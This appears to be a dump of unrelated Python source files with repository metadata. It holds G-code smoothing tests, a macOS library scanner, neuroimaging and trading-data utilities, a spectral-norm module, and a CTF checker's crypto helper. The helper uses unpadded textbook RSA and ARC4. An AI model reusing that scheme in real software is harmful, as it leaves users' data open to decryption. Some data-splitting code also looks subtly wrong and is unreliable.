check_distances(data)
plotter(data)
def test_45_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_very_acute_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X0 Y1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1)
check_distances(data)
plotter(data)
def test_135_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X200 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_135_corner_counter_clockwise(plotter):
data = generate_curves([
"G1 X-100 Y-100",
"G1 X-200 Y-100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1)
check_distances(data)
plotter(data)
def test_very_obtuse_corner(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X200 Y1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_short_lines(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X20 Y0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="middle")
straight_segment(data, l=1, s=2, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_shorter_and_longer_line(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X30 Y0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_obtuse_corner_with_longer_and_shorter_line(plotter):
data = generate_curves([
"G1 X20 Y0",
"G1 X30 Y-0.1"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 3
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="middle")
straight_segment(data, l=1, s=2, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1)
check_distances(data)
plotter(data)
def test_three_long_lines(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="on")
corner_segment(data, l=1, s=3, start="on", end="on")
straight_segment(data, l=2, s=4, start="on", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 300
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(300, abs=0.1)
check_distances(data)
plotter(data)
def test_three_short_lines(plotter):
data = generate_curves([
"G1 X10 Y0",
"G1 X20 Y0.1",
"G1 X30 Y0.3"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="middle")
corner_segment(data, l=0, s=1, start="middle", end="middle")
# Note that this line is very short
straight_segment(data, l=1, s=2, start="middle", end="middle")
corner_segment(data, l=1, s=3, start="middle", end="middle")
straight_segment(data, l=2, s=4, start="middle", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) <\
10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2])
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1)
check_distances(data)
plotter(data)
def test_three_long_lines_with_z_move(plotter):
data = generate_curves([
"G1 X100 Y0",
"G1 X100 Y100",
"G1 Z10",
"G1 X0 Y100"
], maximum_error=0.01)
assert data.smoothed_toolpath.segment_start.shape[0] == 5
straight_segment(data, l=0, s=0, start="start", end="on")
corner_segment(data, l=0, s=1, start="on", end="on")
straight_segment(data, l=1, s=2, start="on", end="end")
straight_segment(data, l=1, s=3, start="end", end="end")
straight_segment(data, l=3, s=4, start="start", end="end")
assert np.sum(data.smoothed_toolpath.segment_lengths) < 300
assert np.sum(data.smoothed_toolpath.segment_lengths) == \
pytest.approx(300, abs=0.1)
check_distances(data)
plotter(data)
| 2.15625 | 2 |
appify/scan.py | akx/appify | 0 | 12796576 | import subprocess
import threading
from collections import defaultdict
from concurrent.futures import Executor
from concurrent.futures.thread import ThreadPoolExecutor
class RecursiveLibraryScanner:
def __init__(self, executor: Executor, scan_private: bool):
self.executor = executor
self.libraries = defaultdict(set)
self.scanned = set()
self.scan_private = scan_private
self.jobs = []
self.all_done = threading.Event()
def _check(self, job):
if all(j.done() for j in self.jobs):
self.all_done.set()
def _enqueue(self, target):
job = self.executor.submit(self._scan, target)
job.add_done_callback(self._check)
self.jobs.append(job)
def _scan(self, target):
# print("scanning", target, file=sys.stderr)
self.scanned.add(target)
for lib in scan_libraries(target):
self.libraries[target].add(lib)
if lib not in self.scanned:
is_private = smells_private(lib)
if (is_private and self.scan_private) or not is_private:
self._enqueue(lib)
def scan(self, target):
self._enqueue(target)
self.all_done.wait()
return self.libraries
def scan_libraries_recursive(initial_target, scan_private=True):
with ThreadPoolExecutor() as executor:
rls = RecursiveLibraryScanner(executor, scan_private=scan_private)
return rls.scan(initial_target)
def scan_libraries(target):
in_load_dylib = False
libraries = set()
for line in subprocess.check_output(
["otool", "-l", target], encoding="utf-8"
).splitlines():
line = line.strip()
if line == "cmd LC_LOAD_DYLIB":
in_load_dylib = True
if in_load_dylib and line.startswith("name "):
words = line.split()
lib = words[1]
libraries.add(lib)
in_load_dylib = False
return libraries
def smells_private(lib):
if lib.startswith("/System/Library"):
return True
if lib.startswith("/usr/lib/"):
return True
if lib.startswith("/usr/local/lib/"):
return True
return False
def filter_private(scanned_libraries):
public_libraries = {
target: {lib for lib in libraries if not smells_private(lib)}
for (target, libraries) in scanned_libraries.items()
if not smells_private(target)
}
return public_libraries
| 2.5625 | 3 |
aslprep/workflows/asl/__init__.py | lawlessrd/aslprep | 2 | 12796577 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Pre-processing ASL - ASL signal workflows
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.. automodule:: aslprep.workflows.asl.base
.. automodule:: aslprep.workflows.asl.hmc
.. automodule:: aslprep.workflows.asl.stc
.. automodule:: aslprep.workflows.asl.t2s
.. automodule:: aslprep.workflows.asl.registration
.. automodule:: aslprep.workflows.asl.resampling
.. automodule:: aslprep.workflows.asl.confounds
.. automodule:: aslprep.workflows.asl.cbf
"""
from .base import init_asl_preproc_wf
from .gecbf import init_asl_gepreproc_wf
from .hmc import init_asl_hmc_wf
from .stc import init_asl_stc_wf
from .t2s import init_asl_t2s_wf
from .registration import (
init_asl_t1_trans_wf,
init_asl_reg_wf,
)
from .resampling import (
init_asl_std_trans_wf,
init_asl_surf_wf,
init_asl_preproc_trans_wf,
)
from .confounds import (
init_asl_confs_wf
)
from .cbf import (
init_cbf_compt_wf,
init_cbfqc_compt_wf,
init_cbfplot_wf,
init_gecbfplot_wf,
init_cbfroiquant_wf,
init_gecbf_compt_wf,
init_cbfgeqc_compt_wf)
from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf,
init_asl_t1_getrans_wf,init_asl_gestd_trans_wf)
__all__ = [
'init_asl_confs_wf',
'init_gecbf_compt_wf',
'init_asl_t1_getrans_wf',
'init_asl_geref_wf',
'init_asl_gereg_wf',
'init_asl_gestd_trans_wf',
'init_asl_hmc_wf',
'init_asl_std_trans_wf',
'init_asl_preproc_trans_wf',
'init_asl_reg_wf',
'init_asl_stc_wf',
'init_asl_surf_wf',
'init_asl_t1_trans_wf',
'init_asl_t2s_wf',
'init_asl_preproc_wf',
'init_cbf_compt_wf',
'init_cbfqc_compt_wf',
'init_cbfplot_wf',
'init_cbfroiquant_wf',
'init_cbfgeqc_compt_wf'
]
| 1.953125 | 2 |
keepworking/settings.py | yelijing18/KeepWorking | 0 | 12796578 | <gh_stars>0
# -*- coding: utf-8 -*-
from decouple import config
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv('.env', usecwd=True))
load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True))
COUNTDOWN = config('COUNTDOWN', default=5, cast=int)
EVENT_INTERVAL = config('EVENT_INTERVAL', default=1, cast=int)
| 1.5 | 2 |
convert_png_images_using_clahe.py | tybrad11/kaggle_ich | 0 | 12796579 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 21 14:21:03 2019
@author: tjb129
"""
import numpy as np
from PIL import Image
from skimage.exposure import equalize_adapthist
import os
from matplotlib import pyplot as plt
parent = '/data/Kaggle'
folders = [ 'pos-all-png',
'test-png',
'train-png',
'neg-filt-png',
'pos-filt-png']
for dir_i in folders:
dir_i = os.path.join(parent, dir_i)
save_dir = dir_i + '-clahe'
if not os.path.exists(save_dir):
os.mkdir(save_dir)
for f in os.listdir(dir_i):
fname = os.fsdecode(f)
if fname.endswith(".png"):
im = np.array(Image.open(os.path.join(dir_i, fname)))
if len(im.shape) > 2:
im = im[..., 0]
im = im.astype(np.float)
# normalize to [0,1]
im /= 255.
im = equalize_adapthist(im)
im = np.uint8(im*255)
im2 = Image.fromarray(im)
im2.save(os.path.join(save_dir, fname))
| 2.203125 | 2 |
datamodeling/dscreator.py | AI-Traiding-Team/paired_trading | 1 | 12796580 | <reponame>AI-Traiding-Team/paired_trading
import os
import sys
import time
import copy
import pytz
import numpy as np
import datetime
import pandas as pd
from typing import Tuple
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import RobustScaler
from sklearn.preprocessing import LabelEncoder
from sklearn.preprocessing import LabelBinarizer
from sklearn.preprocessing import OneHotEncoder
from sklearn.preprocessing import FunctionTransformer
from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
from dataclasses import dataclass
from analyze.dataload import DataLoad
from datamodeling.datafeatures import DataFeatures, DSProfile
__version__ = 0.0010
def get_local_timezone_name():
if time.daylight:
offset_hour = time.altzone / 3600
else:
offset_hour = time.timezone / 3600
offset_hour_msg = f"{offset_hour:.0f}"
if offset_hour > 0:
offset_hour_msg = f"+{offset_hour:.0f}"
return f'Etc/GMT{offset_hour_msg}'
class TSDataGenerator(TimeseriesGenerator):
def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None,
shuffle=False, reverse=False, batch_size=128):
super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse,
batch_size)
if len(data) != len(targets):
raise ValueError('Data and targets have to be' +
' of same length. '
'Data length is {}'.format(len(data)) +
' while target length is {}'.format(len(targets)))
if overlap >= length:
raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed')
if overlap > 0:
start_index += overlap
self.data = data
self.targets = targets
self.length = length
self.sampling_rate = sampling_rate
self.stride = stride
self.start_index = start_index + length
self.overlap = overlap
if end_index is None:
end_index = len(data) - 1
self.end_index = end_index
self.shuffle = shuffle
self.reverse = reverse
self.batch_size = batch_size
self.sample_shape = None
if self.start_index > self.end_index:
raise ValueError('`start_index+length=%i > end_index=%i` '
'is disallowed, as no part of the sequence '
'would be left to be used as current step.'
% (self.start_index, self.end_index))
self.sample_shape = self.calc_shape()
pass
def calc_shape(self):
index = 0
i = (self.start_index + self.batch_size * self.stride * index)
rows = np.arange(i, min(i + self.batch_size *
self.stride, self.end_index + 1), self.stride)
samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate]
for row in rows])
# self.sample_shape = np.expand_dims(samples, axis=0).shape
sample_shape = (samples.shape[-2], samples.shape[-1],)
return sample_shape
def __getitem__(self, index):
if self.shuffle:
rows = np.random.randint(
self.start_index, self.end_index + 1, size=self.batch_size)
else:
i = (self.start_index + self.batch_size * self.stride * index)
rows = np.arange(i, min(i + self.batch_size *
self.stride, self.end_index + 1), self.stride)
samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate]
for row in rows])
# self.sample_shape = samples.shape
targets = np.array([self.targets[row] for row in rows])
if self.reverse:
return samples[:, ::-1, ...], targets
return samples, targets
@dataclass
class DataSet:
def __init__(self):
self.name: str = ''
self.dataset_profile = DSProfile()
self.features_df = None
self.y_df = None
self.x_Train = None
self.y_Train = None
self.x_Val = None
self.y_Val = None
self.x_Test = None
self.y_Test = None
self.features_scaler = object
self.targets_scaler = object
self.train_gen = None
self.val_gen = None
self.test_gen = None
self.input_shape = None
pass
def get_train(self):
if (self.x_Train is not None) and (self.y_Train is not None):
return self.x_Train, self.y_Train
def get_val(self):
if (self.x_Val is not None) and (self.y_Val is not None):
return self.x_Val, self.y_Val
def get_test(self):
if (self.x_Test is not None) and (self.y_Test is not None):
return self.x_Test, self.y_Test
class DSCreator:
"""
Class for dataset creation
for dataset configuration we are using DSConstants dataclass (profile)
"""
def __init__(self,
loader: DataLoad,
dataset_profile: DSProfile):
"""
Getting object with OHLCV data (symbols and timeframes).
All data with chosen period loaded to memory
Args:
loader (DataLoad): object with data
Returns:
DSCreator (class): object
"""
self.features = DataFeatures(loader)
self.dataset_profile = dataset_profile
self.dataset = DataSet()
def split_data_df(self):
df_rows = self.dataset.features_df.shape[0]
df_train_len = int(df_rows * self.dataset_profile.train_size)
df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes)
self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :]
if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0:
self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :]
return df_train_len, df_val_len, None
else:
df_val_len = int(df_rows * self.dataset_profile.val_size)
df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes)
self.dataset.val_df = self.dataset.features_df.iloc[
df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes,
:]
self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :]
return df_train_len, df_val_len, df_test_len
def get_train_generator(self, x_Train_data, y_Train_data):
self.dataset.train_gen = TSDataGenerator(data=x_Train_data,
targets=y_Train_data,
length=self.dataset_profile.tsg_window_length,
sampling_rate=self.dataset_profile.tsg_sampling_rate,
stride=self.dataset_profile.tsg_stride,
start_index=self.dataset_profile.tsg_start_index,
overlap=self.dataset_profile.tsg_overlap,
)
return self.dataset.train_gen
def get_val_generator(self, x_Val_data, y_Val_data):
self.dataset.val_gen = TSDataGenerator(data=x_Val_data,
targets=y_Val_data,
length=self.dataset_profile.tsg_window_length,
sampling_rate=self.dataset_profile.tsg_sampling_rate,
stride=self.dataset_profile.tsg_stride,
start_index=self.dataset_profile.tsg_start_index,
overlap=self.dataset_profile.tsg_overlap,
)
return self.dataset.val_gen
def get_test_generator(self, x_Test_data, y_Test_data):
self.dataset.test_gen = TSDataGenerator(data=x_Test_data,
targets=y_Test_data,
length=self.dataset_profile.tsg_window_length,
sampling_rate=self.dataset_profile.tsg_sampling_rate,
stride=self.dataset_profile.tsg_stride,
start_index=self.dataset_profile.tsg_start_index,
overlap=self.dataset_profile.tsg_overlap,
)
return self.dataset.test_gen
def create_close1_close2_power(self):
if self.dataset_profile.scaler == "robust":
self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)
self.dataset.targets_scaler = None
else:
msg = "Error: Unknown scaler preparation type"
sys.exit(msg)
x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)
""" check """
y_arr = self.dataset.y_df.values
self.prepare_datagens(x_arr, y_arr)
pass
def create_power_trend(self):
if self.dataset_profile.scaler == "robust":
self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)
self.dataset.targets_scaler = None
else:
msg = "Error: Unknown scaler preparation type"
sys.exit(msg)
x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)
""" check """
y_arr = self.dataset.y_df.values
self.prepare_datagens(x_arr, y_arr)
pass
def create_close1_close2_trend(self):
if self.dataset_profile.scaler == "robust":
self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)
self.dataset.targets_scaler = None
else:
msg = "Error: Unknown scaler preparation type"
sys.exit(msg)
x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)
""" check """
y_arr = self.dataset.y_df.values
self.prepare_datagens(x_arr, y_arr)
pass
def prepare_datagens(self, x_arr, y_arr):
train_len, val_len, test_len = self.split_data_df()
if test_len is None:
x_Train_data = x_arr[train_len:, :]
x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :]
y_Train_data = y_arr[train_len:, :]
y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :]
else:
x_Train_data = x_arr[train_len:, :]
x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :]
x_Test_data = x_arr[x_arr.shape[0] - test_len:, :]
y_Train_data = y_arr[train_len:, :]
y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :]
y_Test_data = y_arr[x_arr.shape[0] - test_len:, :]
x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data)
""" Using generator 1 time to have solid data """
self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data)
# x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data)
""" Using generator 1 time to have solid data """
x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data)
x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data)
self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data)
self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data)
self.dataset.input_shape = x_Val_gen.sample_shape
pass
def create_dataset(self) -> DataSet:
self.dataset.dataset_profile = DSProfile()
self.dataset.features_df = self.features.collect_features(self.dataset_profile)
self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}'
if self.dataset_profile.Y_data == "close1-close2":
self.dataset.y_df = self.features.create_y_close1_close2_sub()
elif self.dataset_profile.Y_data == "close1-close2_trend":
self.dataset.y_df = self.features.create_y_close1_close2_sub_trend()
self.create_close1_close2_trend()
return self.dataset
elif self.dataset_profile.Y_data == "close1-close2_power":
self.dataset.y_df = self.features.create_y_close1_close2_sub_power()
self.create_close1_close2_power()
return self.dataset
elif self.dataset_profile.Y_data == "power_trend":
weight = self.dataset.dataset_profile.power_trend
self.dataset.y_df = self.features.create_power_trend(weight)
self.create_power_trend()
return self.dataset
else:
msg = "Error: Unknown dataset preparation type"
sys.exit(msg)
self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}'
y_temp = self.dataset.y_df.values.reshape(-1, 1)
if self.dataset_profile.scaler == "robust":
self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values)
self.dataset.targets_scaler = RobustScaler().fit(y_temp)
else:
msg = "Error: Unknown scaler preparation type"
sys.exit(msg)
x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values)
""" check """
y_arr = self.dataset.targets_scaler.transform(y_temp)
self.prepare_datagens(x_arr, y_arr)
return self.dataset
def create_data_from_gen(self, x_arr, y_arr):
gen = TSDataGenerator(data=x_arr,
targets=y_arr,
length=self.dataset_profile.tsg_window_length,
sampling_rate=self.dataset_profile.tsg_sampling_rate,
stride=self.dataset_profile.tsg_stride,
start_index=self.dataset_profile.tsg_start_index,
overlap=self.dataset_profile.tsg_overlap,
batch_size=x_arr.shape[0]
)
for x_data, y_data in gen:
continue
return x_data, y_data
def save_dataset_arrays(self, path_filename):
pass
if __name__ == "__main__":
"""
Usage for DataLoad class
------------------------
pairs_symbol = None -> Use all pairs in timeframe directory
pairs_symbol = ("BTCUSDT", "ETHUSDT") -> Use only this pairs to load
time_intervals = None -> Use all timeframes directories for loading (with pairs_symbols)
time_intervals = ['15m'] -> Use timeframes from this list to load
start_period = None -> Use from [0:] of historical data
start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex
end_period = None -> Use until [:-1] of historical data
end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex
source_directory="../source_root" -> Use this directory to search timeframes directory
"""
loaded_crypto_data = DataLoad(pairs_symbols=None,
time_intervals=['15m'],
source_directory="../source_root",
start_period='2021-11-01 00:00:00',
end_period='2021-12-05 23:59:59',
)
dataset_1_profile = DSProfile()
dsc = DSCreator(loaded_crypto_data,
dataset_1_profile)
dataset_1_cls = dsc.create_dataset()
| 2.078125 | 2 |
utils/bn_sn_chen.py | sebemery/Lipschitz-constrained-neural-networks | 0 | 12796581 | <reponame>sebemery/Lipschitz-constrained-neural-networks
"""
Spectral Normalization borrowed from https://arxiv.org/abs/1802.05957
SN for batch normalization layers to be of Lipschtz constant sigma (default=1.0).
"""
import torch
from torch.nn.parameter import Parameter
class BatchNormSpectralNorm(object):
def __init__(self, name='weight', sigma=1.0, eps=1e-12):
self.name = name
self.sigma = sigma
self.eps = eps
def compute_weight(self, module):
weight = getattr(module, self.name + '_orig')
bias = getattr(module, "bias_orig")
running_var = getattr(module, "running_var")
with torch.no_grad():
cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var)))
# print(cur_sigma)
cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma)
# print(cur_sigma)
weight = weight / cur_sigma
bias = bias / cur_sigma
return weight, bias
def remove(self, module):
weight = getattr(module, self.name)
bias = getattr(module, "bias")
delattr(module, self.name)
delattr(module, self.name + '_orig')
delattr(module, "bias")
delattr(module, "bias_orig")
module.register_parameter(self.name, torch.nn.Parameter(weight.detach()))
module.register_parameter("bias", torch.nn.Parameter(bias.detach()))
def __call__(self, module, inputs):
if module.training:
weight, bias = self.compute_weight(module)
setattr(module, self.name, weight)
setattr(module, "bias", bias)
else:
weight_r_g = getattr(module, self.name + '_orig').requires_grad
bias_r_g = getattr(module, "bias_orig").requires_grad
getattr(module, self.name).detach_().requires_grad_(weight_r_g)
getattr(module, "bias").detach_().requires_grad_(bias_r_g)
@staticmethod
def apply(module, name, sigma, eps):
fn = BatchNormSpectralNorm(name, sigma, eps)
weight = module._parameters[name]
bias = module._parameters["bias"]
delattr(module, fn.name)
delattr(module, "bias")
module.register_parameter(fn.name + "_orig", weight)
module.register_parameter("bias_orig", bias)
# We still need to assign weight back as fn.name because all sorts of
# things may assume that it exists, e.g., when initializing weights.
# However, we can't directly assign as it could be an nn.Parameter and
# gets added as a parameter. Instead, we register weight.data as a
# buffer, which will cause weight to be included in the state dict
# and also supports nn.init due to shared storage.
module.register_buffer(fn.name, weight.data)
module.register_buffer("bias", bias.data)
module.register_forward_pre_hook(fn)
return fn
def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12):
r"""Applies spectral normalization to a parameter in the given module.
.. math::
\mathbf{W} &= \dfrac{\mathbf{W}}{\sigma(\mathbf{W})} \\
\sigma(\mathbf{W}) &= \max_{\mathbf{h}: \mathbf{h} \ne 0} \dfrac{\|\mathbf{W} \mathbf{h}\|_2}{\|\mathbf{h}\|_2}
Spectral normalization stabilizes the training of discriminators (critics)
in Generaive Adversarial Networks (GANs) by rescaling the weight tensor
with spectral norm :math:`\sigma` of the weight matrix calculated using
power iteration method. If the dimension of the weight tensor is greater
than 2, it is reshaped to 2D in power iteration method to get spectral
norm. This is implemented via a hook that calculates spectral norm and
rescales weight before every :meth:`~Module.forward` call.
See `Spectral Normalization for Generative Adversarial Networks`_ .
.. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957
Args:
module (nn.Module): containing module
name (str, optional): name of weight parameter
eps (float, optional): epsilon for numerical stability in
calculating norms
Returns:
The original module with the spectal norm hook
Example::
>>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10))
BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
>>> m.weight_orig.size()
torch.Size([10])
"""
BatchNormSpectralNorm.apply(module, name, sigma, eps)
return module
def remove_bn_spectral_norm(module, name='weight'):
r"""Removes the spectral normalization reparameterization from a module.
Args:
module (nn.Module): containing module
name (str, optional): name of weight parameter
Example:
>>> m = spectral_norm(nn.Linear(40, 10))
>>> remove_spectral_norm(m)
"""
for k, hook in module._forward_pre_hooks.items():
if isinstance(hook, BatchNormSpectralNorm) and hook.name == name:
hook.remove(module)
del module._forward_pre_hooks[k]
return module
raise ValueError("spectral_norm of '{}' not found in {}".format(
name, module))
| 2.625 | 3 |
checkers/kettle/libsimplecrypto.py | SharLike-CTF-Team/altayctf-2019 | 7 | 12796582 | import time
import base64
import binascii
from secrets import token_hex
from rsa import prime
from arc4 import ARC4
def gcd(a, b):
while b != 0:
a, b = b, a % b
return a
def lcm(a, b):
return a * b // gcd(a, b)
def imod(a, n):
i = 1
while True:
c = n * i + 1
if(c % a == 0):
c = c//a
break
i = i+1
return c
def arc4_encrypt(key, message):
arc4 = ARC4(key)
cipher = arc4.encrypt(message)
return cipher
def arc4_decrypt(key, cipher):
arc4 = ARC4(key)
plain = arc4.decrypt(cipher)
return plain
class SimpleRSA:
def __init__(self, bit_length=256):
p, q = 0, 0
while p == q:
p = prime.getprime(bit_length)
q = prime.getprime(bit_length)
self.p = p
self.q = q
self.N = self.p*self.q
self.phi = lcm(self.p - 1, self.q - 1)
self.e = 65537
self.d = imod(self.e, self.phi)
def dump(self):
return (self.p, self.q, self.N, self.phi, self.e, self.d)
def load(self, p, q, N, phi, e, d):
self.p = p
self.q = q
self.N = N
self.phi = phi
self.e = e
self.d = d
def get_pub(self):
return (self.N, self.e)
def get_priv(self):
return (self.N, self.d)
def encrypt(self, m, other_pubkey):
if not isinstance(m, int):
m = int(binascii.hexlify(m.encode()))
return pow(m, other_pubkey[1], other_pubkey[0])
def decrypt(self, c):
res = pow(c, self.d, self.N)
return binascii.unhexlify(str(res))
class Cipher(SimpleRSA):
def __init__(self, params):
self.p = params['p']
self.q = params['q']
self.N = params['N']
self.phi = params['phi']
self.e = params['e']
self.d = params['d']
def decrypt_request(self, tmpkey, message):
k = self.decrypt(tmpkey)
message = arc4_decrypt(k, message)
return message
def encrypt_response(self, user_key, message):
tmpkey = token_hex(nbytes=10)
other_key = (user_key['user_key']['N'], user_key['user_key']['e'])
enc_key = self.encrypt(tmpkey, other_key)
cipher = arc4_encrypt(tmpkey, message)
return dict(
key=enc_key,
data=str(base64.b64encode(cipher))[2:-1]
)
if __name__ == "__main__":
pass | 2.625 | 3 |
src/datastore/persistence_store.py | dgpatelgit/fabric8-analytics-bigquery-manifests-job | 0 | 12796583 | # Copyright © 2020 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
